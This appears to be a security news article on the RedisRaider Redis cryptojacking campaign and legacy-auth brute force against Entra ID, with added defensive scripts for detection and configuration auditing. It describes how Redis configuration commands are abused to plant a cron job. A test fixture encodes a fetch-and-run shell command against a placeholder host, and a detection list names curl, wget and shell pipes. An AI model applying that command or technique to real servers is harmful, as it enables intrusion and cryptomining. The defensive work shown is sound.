A newly uncovered Redis cryptojacking malware campaign is actively targeting publicly exposed Redis servers, using Go-based payloads to deploy the XMRig miner on vulnerable Linux systems.
Researchers at Datadog Security Labs have dubbed this campaign RedisRaider, warning that it’s designed to scan massive portions of the internet’s IPv4 space in search of Redis instances that can be exploited using legitimate configuration commands.
Once a Redis server is identified, the attackers issue an INFO command to confirm the host runs Linux. If it does, they plant a cron job using nothing but legitimate Redis commands: CONFIG SET points the working directory at /etc/cron.d and renames the database file to apache, a SET stores the cron entry as a key value, and a save then writes that "database" into the cron directory. The technique abuses default Redis behavior, since the server will write its snapshot wherever its configuration points, with whatever privileges it runs under.
This file contains a Base64-encoded shell script, which is scheduled to execute automatically. That script downloads the RedisRaider binary from a remote server—acting as a dropper for the XMRig cryptominer.
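The dropped file described above has a recognizable shape: it begins with Redis's RDB header, carries binary metadata, and embeds a readable crontab line that decodes Base64 into a shell. The following checker is an added example for this article, not RedisRaider code or Datadog's tooling; the two sample blobs are constructed to mimic (not reproduce) that layout, and the Base64 in the sample decodes to a harmless command against a reserved `.invalid` domain.

```python
"""Spot cron.d entries that are really Redis RDB dumps carrying an injected cron line.

Added example; not RedisRaider code or Datadog's tooling. It assumes the artifact
looks like the technique described in the article: a file in /etc/cron.d that
starts with the RDB magic "REDIS" and whose stored value is a crontab line piping
Base64 into a shell. The sample blobs below are constructed.
"""
import re
from pathlib import Path

RDB_MAGIC = b"REDIS"

# A /etc/cron.d line: five schedule fields, a user, then the command.
CRON_LINE = re.compile(rb"^(?:[\d*/,\-]+\s+){5}\S+\s+(.+)$", re.MULTILINE)

# Command fragments a dropper cron line tends to contain.
DROPPER_HINTS = (b"base64 -d", b"base64 --decode", b"| sh", b"| bash",
                 b"| /bin/sh", b"curl ", b"wget ")


def inspect_cron_blob(data: bytes) -> dict:
    """Return why (if at all) a cron.d file body looks attacker-written."""
    findings = []
    if data.startswith(RDB_MAGIC):
        findings.append("rdb_header")           # Redis itself wrote this file
    if b"\x00" in data:
        findings.append("binary_content")       # real cron.d files are plain text
    for match in CRON_LINE.finditer(data):
        if any(hint in match.group(1) for hint in DROPPER_HINTS):
            findings.append("dropper_command")  # cron line decodes and runs a payload
            break
    suspicious = "rdb_header" in findings or "dropper_command" in findings
    return {"suspicious": suspicious, "findings": findings}


def scan_cron_dir(path: str = "/etc/cron.d") -> list:
    """Inspect every regular file in a cron.d directory; returns (name, result) pairs."""
    directory = Path(path)
    if not directory.is_dir():
        return []
    return [(entry.name, inspect_cron_blob(entry.read_bytes()))
            for entry in sorted(directory.iterdir()) if entry.is_file()]


# Constructed sample: an RDB-shaped dump whose key value is a cron line. The bytes
# between the header and the cron line imitate RDB metadata; they are not a real dump.
DROPPED_APACHE = (
    b"REDIS0011\xfa\tredis-ver\x057.2.4\xfa\nredis-bits\xc0@\xfe\x00\xfb\x01\x00"
    b"\x00\x01x\x30"
    b"\n\n* * * * * root echo Y3VybCBodHRwOi8vZXhhbXBsZS5pbnZhbGlkL3ggfCBzaA== | base64 -d | sh\n\n"
    b"\xff\x8c\x1d\x00\x00\x00\x00\x00\x00"
)

# Constructed sample: an ordinary administrator-written cron.d file.
BENIGN_CRON = (
    b"# m h dom mon dow user command\n"
    b"0 3 * * * root /usr/bin/apt-get -qq update\n"
)

if __name__ == "__main__":
    for name, blob in (("apache", DROPPED_APACHE), ("apt-refresh", BENIGN_CRON)):
        print(name, inspect_cron_blob(blob))
```

Run `scan_cron_dir()` from a periodic job or an EDR script; any file that starts with the RDB header has no business in a cron directory, and the dropper-command check catches text variants that a later campaign might write without the binary wrapper.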
But this isn’t just a simple mining operation. RedisRaider also includes self-propagation functionality, scanning and infecting other Redis servers to expand the botnet. It even hosts a web-based Monero miner, allowing attackers to diversify their illicit revenue streams.
The malware’s creators have taken steps to avoid detection, using short key time-to-live (TTL) settings and altering Redis configuration parameters. These anti-forensics techniques make it harder for defenders to identify breaches and perform post-incident analysis.
Legacy Authentication Flaws Exploited in Separate Microsoft Entra ID Attack
While RedisRaider spreads through server misconfigurations, another campaign has been observed exploiting legacy authentication protocols in Microsoft Entra ID (formerly Azure AD).
Between March 18 and April 7, 2025, researchers at Guardz tracked a brute-force attack leveraging the outdated BAV2ROPC protocol (Basic Authentication Version 2 – Resource Owner Password Credential). Because the client hands the username and password straight to the token endpoint, there is no interactive sign-in at which MFA could be prompted, so the method sidesteps MFA and Conditional Access on tenants that still allow the legacy flow and have no policy explicitly blocking it.
The attackers, believed to be operating from Eastern Europe and Asia-Pacific, focused their efforts on privileged admin accounts. Regular users saw over 50,000 login attempts, but more than 9,800 targeted attempts were made on admin accounts across 432 IP addresses in just 8 hours, showing a sharp focus on high-value targets.
Guardz’s analysis suggests a highly automated and concentrated brute-force strategy, using legacy authentication endpoints as a soft entry point. This is not unprecedented; Microsoft reported similar attacks in 2021 involving IMAP, POP3, and BAV2ROPC to bypass MFA and conduct large-scale business email compromise (BEC) operations.
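The pattern Guardz describes, many failed legacy-protocol sign-ins from one source against admin accounts inside a short window, is straightforward to hunt for in Entra sign-in logs. The script below is an added example for this article, not Guardz's tooling. Field names follow the Microsoft Graph signIn resource as the author understands it (createdDateTime, userPrincipalName, ipAddress, clientAppUsed, userAgent, status.errorCode), the admin lookup is a stand-in for a directory-role query, and the sign-in records are constructed.

```python
"""Flag legacy-auth brute force against Entra ID from sign-in records.

Added example for this article; not Guardz's tooling. Record fields follow the
Microsoft Graph signIn resource as understood by the author; is_admin_account
stands in for a directory-role lookup (assumption). Records below are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# clientAppUsed values Entra reports for legacy (non-modern) authentication.
LEGACY_CLIENT_APPS = {"Authenticated SMTP", "IMAP4", "POP3", "Exchange ActiveSync",
                      "Other clients", "Exchange Web Services", "MAPI Over HTTP",
                      "Outlook Anywhere (RPC over HTTP)", "Autodiscover"}
FAILED_ATTEMPT_THRESHOLD = 5            # failures from one IP inside WINDOW
WINDOW = timedelta(minutes=10)

ADMIN_UPNS = {"admin@example.com", "breakglass@example.com"}  # constructed stand-in


def is_admin_account(upn: str) -> bool:
    """Assumption: real code would query directory role assignments instead."""
    return upn in ADMIN_UPNS


def _ts(value: str) -> datetime:
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def is_legacy_auth(rec: dict) -> bool:
    """BAV2ROPC appears as the user agent when Exchange Online turns basic auth into ROPC."""
    return (rec.get("clientAppUsed") in LEGACY_CLIENT_APPS
            or "BAV2ROPC" in rec.get("userAgent", ""))


def analyze(records: list, is_admin=is_admin_account) -> dict:
    failures = defaultdict(list)          # ip -> [(time, upn)] for failed legacy sign-ins
    legacy_success = []                   # legacy auth that worked: still enabled somewhere
    for rec in records:
        if not is_legacy_auth(rec):
            continue
        if rec["status"]["errorCode"] == 0:
            legacy_success.append((rec["userPrincipalName"], rec["ipAddress"]))
        else:
            failures[rec["ipAddress"]].append((_ts(rec["createdDateTime"]),
                                               rec["userPrincipalName"]))

    brute_force = {}
    for ip, events in failures.items():
        events.sort()
        start = 0
        for end in range(len(events)):   # sliding window over the sorted failures
            while events[end][0] - events[start][0] > WINDOW:
                start += 1
            if end - start + 1 >= FAILED_ATTEMPT_THRESHOLD:
                upns = {upn for _, upn in events}
                brute_force[ip] = {"attempts": len(events),
                                   "accounts": sorted(upns),
                                   "admin_targeted": sorted(u for u in upns if is_admin(u))}
                break
    return {"brute_force_ips": brute_force, "legacy_successes": legacy_success}


def _rec(time, upn, ip, app, agent, code):
    return {"createdDateTime": time, "userPrincipalName": upn, "ipAddress": ip,
            "clientAppUsed": app, "userAgent": agent, "status": {"errorCode": code}}


# Constructed records: a burst of BAV2ROPC failures (50126 = bad credentials) against
# two admin accounts, one modern-auth success, one legacy success, two slow failures.
SAMPLE_SIGNINS = [
    _rec("2025-03-20T01:00:05Z", "admin@example.com", "203.0.113.7", "Authenticated SMTP", "BAV2ROPC", 50126),
    _rec("2025-03-20T01:00:41Z", "admin@example.com", "203.0.113.7", "Authenticated SMTP", "BAV2ROPC", 50126),
    _rec("2025-03-20T01:01:12Z", "breakglass@example.com", "203.0.113.7", "Authenticated SMTP", "BAV2ROPC", 50126),
    _rec("2025-03-20T01:01:58Z", "admin@example.com", "203.0.113.7", "Authenticated SMTP", "BAV2ROPC", 50126),
    _rec("2025-03-20T01:02:33Z", "breakglass@example.com", "203.0.113.7", "Authenticated SMTP", "BAV2ROPC", 50126),
    _rec("2025-03-20T01:03:09Z", "admin@example.com", "203.0.113.7", "Authenticated SMTP", "BAV2ROPC", 50126),
    _rec("2025-03-20T01:02:00Z", "j.doe@example.com", "198.51.100.20", "Browser", "Mozilla/5.0", 0),
    _rec("2025-03-20T01:05:00Z", "j.doe@example.com", "192.0.2.44", "IMAP4", "BAV2ROPC", 0),
    _rec("2025-03-20T00:10:00Z", "admin@example.com", "192.0.2.9", "POP3", "BAV2ROPC", 50126),
    _rec("2025-03-20T00:50:00Z", "admin@example.com", "192.0.2.9", "POP3", "BAV2ROPC", 50126),
]

if __name__ == "__main__":
    print(analyze(SAMPLE_SIGNINS))
```

The successful legacy sign-in is reported separately on purpose: even when no brute force is under way, it proves a mailbox or protocol is still accepting basic authentication and belongs on the list of things to switch off.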
Mitigation Steps to Defend Against RedisRaider and BAV2ROPC Attacks
To protect against Redis cryptojacking malware, system administrators should:
- Never expose Redis to the public internet; bind it to localhost or a private interface and leave protected mode enabled.
- Use strong access controls and firewalls to limit access, and require authentication (requirepass or Redis ACLs).
- Disable or rename dangerous commands such as CONFIG where possible, via rename-command or ACL rules.
- Regularly monitor for unauthorized cron jobs or unusual processes.
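Most of the Redis items above can be verified from redis.conf alone. The auditor below is an added example for this article, not Redis project code or Datadog tooling; it parses the directives the list refers to (bind, protected-mode, requirepass, user, rename-command) and reports the gaps RedisRaider depends on. The three configurations are constructed, and the password values are placeholders rather than real secrets.

```python
"""Audit a redis.conf for the exposure RedisRaider relies on.

Added example for this article, not Redis project code or Datadog tooling. It reads
the directives behind the mitigation list: network binding, protected mode,
authentication, and whether CONFIG is still reachable. The configs below are
constructed; the passwords are placeholders, not real secrets.
"""
import shlex

# Forms of `bind` that listen on every interface (a missing `bind` does the same).
ALL_INTERFACES = {"0.0.0.0", "*", "::", "-*", "-::", "-0.0.0.0"}


def parse_redis_conf(text: str) -> list:
    """Return (directive, args) pairs; redis.conf is one directive per line, shell-style quoting."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = shlex.split(line)
        entries.append((tokens[0].lower(), tokens[1:]))
    return entries


def audit_redis_conf(text: str) -> list:
    entries = parse_redis_conf(text)

    def values(directive):
        return [args for d, args in entries if d == directive]

    findings = []
    binds = values("bind")
    if not binds or any(tok in ALL_INTERFACES for tok in binds[-1]):
        findings.append("bind_all_interfaces")

    protected = values("protected-mode")          # defaults to yes when absent
    if protected and protected[-1][0].lower() == "no":
        findings.append("protected_mode_off")

    # Auth is present if requirepass is set or the default ACL user has a password.
    default_user = [args for args in values("user") if args and args[0] == "default"]
    default_nopass = any("nopass" in args for args in default_user)
    if default_nopass or not (values("requirepass") or default_user):
        findings.append("no_authentication")

    # CONFIG is what lets an attacker point `dir` at /etc/cron.d; it must be renamed
    # away or denied through ACL categories.
    renamed_away = {args[0].upper() for args in values("rename-command")
                    if len(args) == 2 and args[1] == ""}
    acl_denies = any("-@dangerous" in args or "-config" in args for args in values("user"))
    if "CONFIG" not in renamed_away and not acl_denies:
        findings.append("config_command_exposed")
    return findings


# Constructed: the kind of server RedisRaider's scanner is looking for.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
dbfilename dump.rdb
"""

# Constructed: same server, loopback only, password set, CONFIG removed.
HARDENED_CONF = """
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass replace-with-a-long-random-secret
rename-command CONFIG ""
rename-command FLUSHALL ""
dir /var/lib/redis
dbfilename dump.rdb
"""

# Constructed: Redis 6+ style, private interface, ACL denies the dangerous category.
ACL_CONF = """
bind 10.0.0.5
protected-mode yes
user default on >replace-with-a-long-random-secret ~* &* +@all -@dangerous
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF), ("acl", ACL_CONF)):
        print(name, audit_redis_conf(conf))
```

A clean audit is necessary but not sufficient: a host firewall or security group that exposes port 6379 undoes a good `bind`, and an ACL file loaded through `aclfile` is not visible to this parser, so check those separately.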
For Entra ID environments, it’s critical to:
- Disable legacy authentication protocols like BAV2ROPC.
- Enforce Conditional Access policies to block outdated logins.
- Turn off SMTP AUTH in Exchange Online if unused.
These recent campaigns underscore the urgent need for organizations to close gaps in legacy systems and monitor for silent crypto-mining operations that may go unnoticed until it’s too late.